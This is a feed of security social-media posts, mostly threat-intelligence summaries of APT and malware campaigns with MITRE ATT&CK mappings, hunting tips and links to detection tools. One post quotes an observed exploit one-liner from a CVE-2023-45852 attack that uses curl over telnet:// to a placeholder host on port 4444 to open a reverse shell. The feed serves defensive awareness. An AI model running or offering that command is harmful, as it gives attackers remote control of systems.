The Risks of AI for Detecting Threats - A Bit of Security for March 17, 2025
What is the downside of relying on AI to detect threats? Listen to this -
https://youtu.be/_0AdSztIT9Y
#cybersecuritytips #attachsurface #antimalware #AIsecurity #threatdetection #BitofSec
First time I'm seeing curl being used with telnet:// to fetch a payload. Found in an exploitation of CVE-2023-45852
C='curl -Ns telnet://x.x.x.x:4444'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null
Good day everyone!
An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used an age-old technique of spear-phishing to gain initial access that had various attachments that would contain the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.
As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!
Angry Likho: Old beasts in a new forest
https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
PRevent: Open-source tool to detect malicious code in pull requests https://www.helpnetsecurity.com/2025/02/20/prevent-open-source-tool-to-detect-malicious-code-in-pull-requests/ #softwaredevelopment #threatdetection #codeanalysis #programming #JavaScript #opensource #Don'tmiss #Hotstuff #Apiiro #GitHub #Kotlin #Python #News #Java #Ruby #PHP
Good day everyone!
Fortinet's FortiGuard Labs discovered a new variant of the #Snake keylogger, a.k.a. "404 Keylogger". According to the report most of the detections from their "FortiSandbox" have come from China, Turkey, Indonesia, Taiwan, and Spain but if you aren't from these countries, you still may be a target!
Behaviors (MITRE ATT&CK):
Persistence - TA0003:
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - After the malware is executed and drops a copy of itself in the %Local_AppData%\supergroup directory then copies itself the the %Startup% folder.
Defense Evasion - TA0005:
Process Injection: Process Hollowing T1055.012 - The malware injects itself into a legitimate .NET process, in this sample it was RegSvcs.exe. This allowed it to run within a trusted process to evade detection.
Command And Control - TA0011:
Application Layer Protocol: Web Protocols - T1071.001
Application Layer Protocol: Mail Protocols - T1071.003
The malware used multiple techniques to upload stolen credentials. The researchers observed SMTP, Telegram bots, and HTTP Post requests to transmit the data.
As usual, go check out the research for yourself to check out the details that I left out and support the good work! Enjoy and Happy Hunting!
FortiSandbox 5.0 Detects Evolving Snake Keylogger Variant
https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Good day everyone, new Blizzard has dropped!
Microsoft's Threat Intelligence shares their research on a Russian state actor dubbed #SeashellBlizzard! Part of the GRU, they specialize in operations from espionage to information operation and cyber-enabled disruptions which have resulted in destructive attacks and manipulation of ICS. They have leveraged different types of malware to include #KillDisk, #FoxBlade, and #NotPetya.
Behavior Summary (With MITRE ATT&CK):
Initial Access - TA0001:
Exploit Public-Facing Application - T1190
Seashell Blizzard commonly exploited vulnerable public facing infrastructure.
Persistence - TA0003:
Create or Modify System Process: Windows Service - T1543.003 -
Among other means of persistence, Seashell Blizzard created a system service.
Execution - TA0002:
Command and Scripting Interpreter: PowerShell - T1059.001
Command and Scripting Interpreter: Windows Command Shell - T1059.003
Seashell Blizzard abused both of these living off the land binaries for multiple reasons and using multiple different parameters.
As always, there is WAAAAY too many technical details here, so go check it out yourself! Enjoy the read and Happy Hunting!
The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Sigma Rules: Your Guide to Threat Detection’s Open Standard: https://panther.com/blog/your-guide-to-the-sigma-rules-open-standard-for-threat-detection
Kunai pushes further integration with MISP!
This week, we've made significant progress in bridging Kunai with @misp to enhance threat intelligence sharing. Our focus has been on developing kunai-to-misp, a new tool available at https://github.com/kunai-project/pykunai, which processes Kunai logs and creates MISP events to streamline collaboration.
With this, it is now possible to both update MISP from Kunai and feed Kunai from MISP using the misp-to-kunai tool. Here's a practical workflow example:
Analyze a #linux malware sample with Kunai Sandbox (https://github.com/kunai-project/sandbox)
Use kunai-to-misp on the collected Kunai logs
(Optional) Review attributes' IDS flag to maximize detections and reduce false positives
Use misp-to-kunai to distribute the results across all Kunai endpoints
Additionally, we're leveraging MISP’s data model to craft meaningful MISP objects and relationships, offering a clear visual representation of events inside MISP.
Try it out and let us know what you think!
Venator - A flexible threat detection platform that simplifies rule management and deployment using K8s CronJob and Helm.
Check it out:
https://github.com/nianticlabs/venator
AI/LLMs in the Service of Criminals 
As we witness the evolution of adversarial AI techniques, one of the most concerning developments is the use of large language models (LLMs) to obfuscate malicious JavaScript code.
More details: https://unit42.paloaltonetworks.com/using-llms-obfuscate-malicious-javascript/
Late night conversations on how to stop botnets like Mirai...
Corelight’s NOC team faced a unique challenge at Black Hat USA 2024—detecting SSHAMBLE, a new SSH scanner introduced by HD Moore. By tapping into existing logs and Zeek metadata, we identified the tool’s fingerprint in real-time.
What happened next?
Real-time detection. Discovering threats using old logs. 
Zeek metadata making sense of encrypted traffic. 
Head to the blog to learn more: https://corelight.com/blog/black-hat-usa-2024-noc-learnings?utm_source=mstdn&utm_medium=organic-social&utm_campaign=blog&utm_adgroup=blackhat2024noc&utm_content=SSI
Now Available in the AWS Marketplace!
Check out our listing to see how we enable security practitioners to stop threats before they happen, using best-in-class internet intelligence data, detection and monitoring tools, and predictive risk scoring.
openSquat - An open-source tool for detecting domain look-alikes by searching for newly registered domains that might be impersonating legit domains and brands.
Good day everyone!
Ryan R. at Intezer shares with us their work analyzing the #BabbleLoader, which is an "extremely evasive loader, packed with defensive mechanisms that is designed to bypass antivirus and sandbox environments to deliver stealers into memory".
There is a TON of analysis and intel here, so I am going to try and highlight the parts that I find significant and actionable!
Defense Evasion:
- The malware checks the installed graphics adapters to see if it is running in a sandboxed environment or not. This leverages the dxgi.dll which is the DirectX Graphics Infrastructure library.
- It checks the amount of unique running processes in the machine by calling NtQuerySystemInformation. The magic number is 85 unique processes with the assumption that a true infected computer would have more running processes that a sandbox would.
Next Stage:
- The next stage involves a Donut loader which, according the the GitHub README states: "Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.[1]"
- The ultimate payload in these examples were WhiteSnake and Meduza Stealers.
Hunt opportunity:
In this case, because the Donut loader and other payloads involved use command and control as their communication, there is an opportunity to run an unstructured hunt for "new" or anomalous connections. The article also mentioned that the WhiteSnake stealer uses the TOR network for C2 which would involve the installation on the victim's machine, which is another opportunity to find something suspicious.
Well, I am SURE there is plenty of information that is critical to everyone else BUT that is why it is time for you to read it for yourself! Enjoy and Happy Hunting!
Babble Babble Babble Babble Babble Babble BabbleLoader
https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/
Supplemental [1]:
GitHub/TheWover/Donut
https://github.com/TheWover/donut
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday Cyborg Security, Now Part of Intel 471
Happy Friday everyone!
A Joint Advisory from the National Security Agency, Federal Bureau of Investigation (FBI), Cyber National Mission Force, and the National Cyber Security Centre provides updates on the Russian Federation's Foreign Intelligence Service, or #SVR.
According to the advisory, #APT29 (a.k.a Midnight Blizzard, Cozy Bear, and the Dukes) has targeted the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations. They aim to exploit software vulnerabilities for initial access and escalate privileges. They also utilize spearphishing campaigns, password spraying, abuse of supply chain and trusted relationships. They also utilize custom malware and living-off-the-land (LOLBINs) techniques for multiple techniques.
The report includes a list of #CVEs that APT29 has been observed exploiting and attach the vendor and product that are effected with details that describe the vulnerability along with a section of mitigations that your organization can take to increase your security posture.
If you are looking for behaviors that are attributed to APT29, look no further than the MITRE ATT&CK Matrix! This resource has collected historic #TTPs and behaviors and referenced them as well. So while you are working on hardening your environment you can also hunt for their activity as well! Enjoy and Happy Hunting!
Article Source:
Update on SVR Cyber Operations and Vulnerability Exploitation
https://www.ic3.gov/Media/News/2024/241010.pdf
Mitre source:
https://attack.mitre.org/groups/G0016/
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
Happy Thursday everyone!
The Symantec Threat Hunter Team observed activity from the North Korean hashtag#Stonefly group (a.k.a. Andariel, hashtag#APT45, Silent Chollima, Onyx Sleet) and identified parts of their toolset which include the hashtag#Nukebot backdoor, batch files that modify the registry key that is responsible for controlling if credentials are in plaintext or not (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest), and a list of open-source tools.
There were multiple ways that the adversary gained persistence which included some techniques I've discussed before: creating a .lnk file in the startup directory, creating a service, modifying the registry keys that control or execute items on startup, and scheduled tasks. Which makes me bust out the old but gold Hunt Package that covers that! But enjoy the article and Happy Hunting!
Stonefly: Extortion Attacks Continue Against U.S. Targets
https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting $readoftheday
Happy #DFIRDay!
The DFIR Report has released another detailed report that starts with #Nitrogen malware and ends with #BlackCat ransomware encrypting the files of the victim.
Something that really stood out about this attack was the Persistence technique that was observed. Now I am not going to hit you with the same "Run Registry Keys" and "Windows Startup directory" but it does involve scheduled tasks. And not just the existence of a scheduled task being created but MULTIPLE task creation attempts. Not only does the section highlight the "human element" that exists with cyber attacks, since there were multiple mistakes and typos, but makes you question how often this type of thing occurs in your environment. I know I stand a little outside of organizations and I only have a small window in, but I think that this many attempts from a single or multiple hosts seems like a red flag. In other words, don't just think about the technique, think about frequency and how often this might legitimately exist. Once you understand that, it is easier to find the abnormal! Enjoy the rest of the article and Happy Hunting!
Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware
https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/#initial-access
Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday Cyborg Security, Now Part of Intel 471
Detecting Malicious Use of LOLBins: https://www.huntress.com/blog/detecting-malicious-use-of-lolbins
For those wondering how to gain visibility on their #Linux system for #ThreatDetection and #ThreatHunting:
Check out the Kunai Project! It's completely free and supports IoC-based detection, Yara rules, custom detection rules, and more.
A new release is available: https://github.com/kunai-project/kunai/releases
